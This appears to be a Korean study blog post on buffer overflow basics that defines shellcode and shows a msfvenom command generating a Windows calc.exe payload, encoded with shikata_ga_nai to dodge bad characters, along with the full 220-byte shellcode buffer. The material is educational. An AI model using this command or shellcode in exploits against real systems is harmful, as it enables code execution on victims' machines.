BOF 기초공부 중 2

셸코드에 대해서 알아보자.

쉘코드란 : 취약한 소프트웨어를 Exploit 하기위해 사용되는 페이로드

"작은 코드조각"이라고도 한다.

수동적으로 쉘코드를 작성하는 방법

1단계 c언어 제작

2단계 어셈블리어 제작

3단계 기계어 제작 

하지만, msfvenom을 사용할 수 있다.

with kali linux

명령어

msfvenom -p windows/exec CMD=calc.exe -f python -e x86/shikata_ga_nai -b '\x00\xff'

bad character: \x00\xff : 페이로드 구성에 악영향을 끼침

그래서 제거하는 것 

root@kali:~# msfvenom -p windows/exec CMD=calc.exe -f python -e x86/shikata_ga_nai -b '\x00\xff'

        

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 220 (iteration=0)

x86/shikata_ga_nai chosen with final size 220

Payload size: 220 bytes

Final size of python file: 1060 bytes

buf =  ""

buf += "\xba\x27\x46\xed\x69\xda\xdc\xd9\x74\x24\xf4\x5d\x2b"

buf += "\xc9\xb1\x31\x31\x55\x13\x83\xed\xfc\x03\x55\x28\xa4"

buf += "\x18\x95\xde\xaa\xe3\x66\x1e\xcb\x6a\x83\x2f\xcb\x09"

buf += "\xc7\x1f\xfb\x5a\x85\x93\x70\x0e\x3e\x20\xf4\x87\x31"

buf += "\x81\xb3\xf1\x7c\x12\xef\xc2\x1f\x90\xf2\x16\xc0\xa9"

buf += "\x3c\x6b\x01\xee\x21\x86\x53\xa7\x2e\x35\x44\xcc\x7b"

buf += "\x86\xef\x9e\x6a\x8e\x0c\x56\x8c\xbf\x82\xed\xd7\x1f"

buf += "\x24\x22\x6c\x16\x3e\x27\x49\xe0\xb5\x93\x25\xf3\x1f"

buf += "\xea\xc6\x58\x5e\xc3\x34\xa0\xa6\xe3\xa6\xd7\xde\x10"

buf += "\x5a\xe0\x24\x6b\x80\x65\xbf\xcb\x43\xdd\x1b\xea\x80"

buf += "\xb8\xe8\xe0\x6d\xce\xb7\xe4\x70\x03\xcc\x10\xf8\xa2"

buf += "\x03\x91\xba\x80\x87\xfa\x19\xa8\x9e\xa6\xcc\xd5\xc1"

buf += "\x09\xb0\x73\x89\xa7\xa5\x09\xd0\xad\x38\x9f\x6e\x83"

buf += "\x3b\x9f\x70\xb3\x53\xae\xfb\x5c\x23\x2f\x2e\x19\xdb"

buf += "\x65\x73\x0b\x74\x20\xe1\x0e\x19\xd3\xdf\x4c\x24\x50"

buf += "\xea\x2c\xd3\x48\x9f\x29\x9f\xce\x73\x43\xb0\xba\x73"

buf += "\xf0\xb1\xee\x17\x97\x21\x72\xf6\x32\xc2\x11\x06"